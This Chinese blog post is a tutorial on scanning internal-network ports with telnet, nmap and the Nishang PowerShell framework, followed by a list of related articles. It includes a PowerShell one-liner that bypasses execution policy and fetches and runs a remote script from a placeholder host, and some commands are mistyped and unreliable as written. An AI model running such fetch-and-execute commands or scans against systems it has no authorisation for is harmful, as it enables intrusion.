扫描内网端口

最新推荐文章于 2025-04-13 16:37:29 发布
原创 最新推荐文章于 2025-04-13 16:37:29 发布
· 5.8k 阅读 · 4 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #经验分享 #测试工具

简介

端口是一切网络入侵的入口。通过对内网主机进行端口扫描,测试人员可以确定目标主机上开放的服务类型、服务版本,并查找相应的漏洞进行攻击。测试人员可以根据目标主机的情况,上传工具进行扫描,也可以借助内网代理或路由转发对目标主机发起扫描。

1利用Telnet 探测端口

Telnet是进行远程登录的标准协议和主要方式,为用户提供了在本地计算机上完成远程主机工作的能力。telnet命令可以简单测试指定的端口号是正常打开还是关闭状态。

telnet <IP> <Port>
2利用 Nmap进行端口扫描

Nmap是一个十分强大的端口扫描工具,在实际利用中可以借助内网代理对内网主机进行端口扫描。关于 Nmap的使用,更多使用方法请参考Nmap官方手册。下面仅给出几个常用的扫描命令。

执行以下命令,扫描目标主机的指定端口

nmap -p 80,88,135,139,443,8080,3306,3389 192.168.204.147

执行以下命令,扫描目标主机开放的全部端口

nmap -sS -p 1-6553510.10.10.11

执行以下命令,扫描并获取目标主机指定端口上开放的服务版本

nmap -sV -p 80,88,135,139,443,8080,3306,3389 10.10.10.11
3利用PowerShell进行端口扫描

NiShang是基于PowerShell 的渗透测试专用框架,集成了各种脚本和 Payload,广泛用于渗透测试的各阶段。 NiShang的 Scan模块中也有一个Invoke-PortsCan.ps1脚本,可以用来对主机进行端口扫描(具体见 Github 上的相关网页)。 执行以下命令,对内网的一个主机范围执行默认的端口扫描:

Invoke-PortScan -StartAddress 192.168.204.1 —EndAddress 192.168.204.254 -ResolveHost -ScanPort

执行以下命令,对内网中的一个主机范围扫描指定的端口

powershell.exe -exec bypass -Command "IEX(New-0bject Net.WebClient). DownloadString(' http://your-ip:;port/Invoke-portscan.ps1');Invoke-PortScan -StartAddress 192.168.204.1 EndAddress-192.168.204.254-ResolveHost -ScanPort -Port 80, 88, 135, 139,443,8080,3306,3389"
2.5-进行内网端口扫描发现
qq_38122566的博客
03-10 959
通过查询目标主机的端口开放信息,不仅可以了解目标主机所开放的服务,还可以找出其开放服务的涌洞、分析目标网络的拓扑结构等,在进行内网渗测试时,通常会使用Metasploit内置的端口进行扫描。也可以上传端口扫描工具,使用工具进行扫描。还可以根据服务器的环境,使用自定义的端口扫描脚本进行扫描,在获得授权的情况下,可以直接使用Nmap、masscan等端口扫描工具获取开放的端口信息。
[内网信息收集] 内网信息收集 —— 内网端口扫描技术
Blue17 の 小窝
03-01 843
PowerSploit 是一款基于 PowerShell 的后渗透框架软件,包含了很多 PowerShell 的攻击脚本,它们主要用于渗透中的信息侦测,权限提升,权限维持等。它为用户提供了在本地计算机上完成远程主机工作的能力。本章笔者将介绍几个常见的内网端口扫描工具,并介绍其基本用法,起到一个抛砖引玉的作用,至于具体的工具学习,笔者后续在精进的时候会把笔记补充上来的。通过查询内网主机的端口开放信息,我们不仅可以了解到目标主机开放的服务,还可以找出其开放服务的漏洞,顺便还能分析目标出目标网络的拓扑结构等。
Portscan一款局域网端口扫描
03-29 3715
它的干净的界面依赖于一个附签式布局,所以您可以很容易地获得你想要的功能与一个单一的点击。它扫描所有可用的端口和显示细节,如MAC地址,主机名、开放港口和HTTP服务器为每个连接的机器。依赖于一个非常干净的界面信息HTTP、FTP、SMTP和SMB服务。Portscan是一款局域网端口扫描器,可以用于扫描目的主机的开放端口,并猜测目的主机的操作系统,支持Edge、Wi-Fi和3G网络。它能够帮助用户查找网络中正在运行的所有电脑设备,并显示出每个设备的mac地址,是否有共享文件,计算机密码是否为空等信息。
内网端口扫描工具.zip
07-18
这是一款用于检测内网设备端口开放的工具,工作中用来检测并封堵端口做安全加固非常有用,有需要的同学可下载安装使用。小工具,大用途。
网络扫描的艺术:使用Nmap发现开放端口
最新发布
weixin_42620563的博客
04-13 443
本文介绍了如何使用Nmap工具进行网络扫描,识别开放端口的步骤。通过命令行示例详细讲解了如何启动终端窗口,输入扫描命令,并提供了对扫描结果进行细化的方法。文章强调了信息收集的重要性,以及在网络安全领域中,掌握这些技能的必要性。
内网端口扫描
Y22Lee的博客
05-09 883
通过查询目标主机的端口开放信息,不仅可以了解目标主机所开放的服务,还可以找出其开放服务的涌洞、分析目标网络的拓扑结构等, 在进行内网渗测试时,通常会使用Metasploit内置的端口进行扫描。也可以上传端口扫描工具,使用工具进行扫描。还可以根据服务器的环境,使用自定义的端口扫描脚本进行扫描。在获得授权的情况下,可以直接使用Nmap、masscan等端口扫描工具获取开放的端口信息。
扫描局域网内所有电脑的端口
weixin_35749545的博客
01-17 2118
扫描局域网内所有电脑端口可以使用工具如Nmap来完成。Nmap是一个开源的网络探测工具,可以用来扫描端口、识别操作系统、检测服务和插件等。使用Nmap扫描局域网内所有电脑端口的命令如下: nmap -sP 192.168.1.0/24 其中192.168.1.0/24是局域网的IP地址范围。 需要注意的是如果要扫描其他电脑的端口,需要在这台电脑有管理员权限,并且需要遵循当地法律法规。 ...
Nmap内网扫描端口
安全小白的博客
04-28 5644
使用BurpSuite爆破路由管理密码 使用BurpSuite爆破密码 主要步骤: 1输入任意密码,使用Proxy模块截取cookie 2.使用Decoder转码分析cookie 3设定cookie变量,使用Intruder模块爆破密码 4.登录路由管理页面
【内网渗透】-端口扫描
Kris__zhang的博客
05-12 811
基于python的PortScan 下载链接:链接:https://pan.baidu.com/s/1YWnpUTrj8YXjXVQQR1MFUQ 提取码:y406 输入要扫描的ip,设置超时时间进行扫描 基于powershell的IPv4PortScanner github:https://github.com/BornToBeRoot/PowerShell_IPv4PortScanner 无法加载文件ps1 主要是由于没有权限执行脚本:set-executionpolicy remotesigned即
[ 内网渗透 ] 内网端口扫描.zip
02-11
本文将详细讲解内网端口扫描的相关知识点,以及提供的几个工具的功能和应用场景。 一、内网端口扫描 内网端口扫描是指在内部网络中对目标主机进行探测,以确定哪些端口是开放的,正在监听网络连接。这有助于了解...
内网扫描端口
tianjinsong的专栏
07-17 1380
扫描指定IP范围内的8006端口,并找到有HTTPS服务且是登录页面的内网IP,我们需要使用curl命令来测试每个IP的8006端口是否提供HTTPS服务,并检查返回的内容是否是登录页面。
扫描局域网活动IP及其端口号
10-18
本资源主要是利用python对局域网活动的ip和开放的端口进行扫描,以获取局域网内活动的ip和端口,方面后续的管理,可以用来学习和参考一下。
内网8181端口扫描工具
02-15
内网8181端口扫描工具
内网扫描工具
09-25
#网络资产信息扫描 在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。 此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表 运行环境:python 2.6 + 参数说明 -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 -p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017) -m 指定线程数量 默认100线程 -t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 -n 不进行存活探测(ICMP)直接进行扫描。 结果报告保存在当前目录(扫描IP-时间戳.html)。 例子: python NAScan.py -h 10.111.1 python NAScan.py -h 192.168.1.1-192.168.2.111 python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6 python NAScan.py -h ip.ini -p port.ini -n 服务识别在server_info.ini文件中配置 格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220- 正则为空时则使用端口进行匹配,否则以正则匹配结果为准。 项目地址 https://github.com/ywolf/ 欢迎大家反馈建议和BUG
局域网端口测试
01-22
局域网端口检测,可检测局域网内电脑主机的端口是否开启,目标主机运行软件,设置TCP或者UDP,设置为服务器,输入端口,测试主机运行软件,同样选择TCP或者UDP(通服务器一致),输入端口,设置TCP模式,需要输入服务端IP,开启服务端,开启客户端,连接正常在界面上会有简易信息显示。
主机发现及端口扫描
weixin_53787530的博客
06-12 2598
Nmap是Network Mapper缩写,Windows和linux下都可以使用,是用来探测计算机网络上的主机和服务的一种安全扫描器,是网络管理员必用的软件之一。常见的端口攻击:文件共享服务端口、远程连接服务端口、web应用服务端口、数据库服务端口、邮件服务端口、特殊服务端口等。功能:有时不想对所有端口进行探测,只想对几个特殊的端口进行扫描,还可以利用参数p 进行指定端口的扫描。功能:此选项设置包含了1-10000的端口ping扫描,操作系统扫描,脚本扫描,路由跟踪,服务探测。
推荐一个内网信息收集端口扫描工具
IT运维技术圈
01-20 990
大家好,波哥又来给大家推荐好东西啦!欢迎大家在评论区留言评论自己想了解的工具、方向或职业等互联网相关内容,点赞和推荐多的,波哥会优先安排解答!介绍SharpScan 是一个由 INotGreen 开发的开源项目,旨在进行内网资产收集、主机存活探测、端口扫描、域控定位、文件搜索,以及对多种服务(如 SSH、SMB、MsSQL 等)进行弱口令爆破,并支持 Socks5 代理功能。该工具集成了自动化和无...
内网扫描器Fscan
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
09-25 3939
内网扫描器fscan
Python 扫描内网所有机器端口
zheng_ruiguo的专栏
12-12 2339
''' Python 扫描内网所有机器端口 ''' import socket def main(): #定义一个变量来接收输入的开始IP ip_start = input('请输入开始的IP地址(默认为本机IP):') #如果IP为空则设置开始IP和结束IP if ip_start == '': ip_start = socket.gethos...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

杭椒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值